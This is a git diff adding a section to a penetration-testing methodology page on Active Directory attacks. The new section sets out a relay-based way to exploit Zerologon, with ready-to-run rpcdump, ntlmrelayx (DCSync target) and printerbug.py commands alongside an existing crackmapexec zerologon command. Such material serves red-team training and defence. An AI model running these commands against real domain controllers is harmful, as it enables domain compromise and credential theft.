diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index ffc0e68..5799f74 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -661,6 +661,26 @@ Exploit steps from the white paper ```powershell crackmapexec smb 10.10.10.10 -u username -p password -d domain -M zerologon ``` + +A 2nd approach to exploit zerologon is done by relaying authentication. + +This technique, [found by dirkjanm](https://dirkjanm.io/a-different-way-of-abusing-zerologon), requires more prerequisites but has the advantage of having no impact on service continuity. +The following prerequisites are needed: +* A domain account +* One DC running the `PrintSpooler` service +* Another DC vulnerable to zerologon + +* `ntlmrelayx` - from Impacket and any tool such as [`printerbug.py`](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py) + ```powershell + # Check if one DC is running the PrintSpooler service + rpcdump.py 10.10.10.10 | grep -A 6 "spoolsv" + + # Setup ntlmrelay in one shell + ntlmrelayx.py -t dcsync://DC01.LAB.LOCAL -smb2support + + #Trigger printerbug in 2nd shell + python3 printerbug.py 'LAB.LOCAL'/joe:Password123@10.10.10.10 10.10.10.12 + ``` #### PrintNightmare